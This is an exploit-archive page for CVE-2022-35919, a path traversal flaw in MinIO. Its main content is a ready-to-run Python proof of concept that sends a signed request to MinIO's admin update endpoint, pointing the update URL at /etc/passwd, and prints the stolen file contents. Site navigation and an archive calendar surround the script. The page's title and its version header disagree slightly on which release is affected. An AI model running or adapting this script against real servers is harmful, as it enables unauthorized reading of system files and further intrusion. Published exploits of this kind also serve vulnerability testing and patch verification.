exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Minio 2022-07-29T19-40-48Z Path Traversal

Minio 2022-07-29T19-40-48Z Path Traversal
Posted Oct 10, 2023
Authored by Jenson Zhao

Minio version 2022-07-29T19-40-48Z suffers from a path traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2022-35919
SHA-256 | e70e4cd749d41bb9ff62f9f8824c552c17eb973e31cf58d0428755e0147d2bc4

Minio 2022-07-29T19-40-48Z Path Traversal

Change Mirror Download
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
# Date: 2023-09-02
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) 2022-07-29T19-40-48Z
# Tested on: Windows 10
# CVE : CVE-2022-35919
# Required before execution: pip install minio,requests
import urllib.parse
import requests, json, re, datetime, argparse
from minio.credentials import Credentials
from minio.signer import sign_v4_s3


class MyMinio():
secure = False

def __init__(self, base_url, access_key, secret_key):
self.credits = Credentials(
access_key=access_key,
secret_key=secret_key
)
if base_url.startswith('http://') and base_url.endswith('/'):
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
elif base_url.startswith('https://') and base_url.endswith('/'):
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
self.secure = True
else:
print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')

def poc(self):
datetimes = datetime.datetime.utcnow()
datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
urls = urllib.parse.urlparse(self.url)
headers = {
'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
'X-Amz-Date': datetime_str,
'Host': urls.netloc,
}
headers = sign_v4_s3(
method='POST',
url=urls,
region='',
headers=headers,
credentials=self.credits,
content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
date=datetimes,
)
if self.secure:
response = requests.post(url=self.url, headers=headers, verify=False)
else:
response = requests.post(url=self.url, headers=headers)
try:
message = json.loads(response.text)['Message']
pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
matches = re.findall(pattern, message)
if matches:
print('There is CVE-2022-35919 problem with the url!')
print('The contents of the /etc/passwd file are as follows:')
for match in matches:
print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
match[6]))
else:
print('There is no CVE-2022-35919 problem with the url!')
print('Here is the response message content:')
print(message)
except Exception as e:
print(
'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
print(response.text)


if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
args = parser.parse_args()
minio = MyMinio(args.url, args.accesskey, args.secretkey)
minio.poc()


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close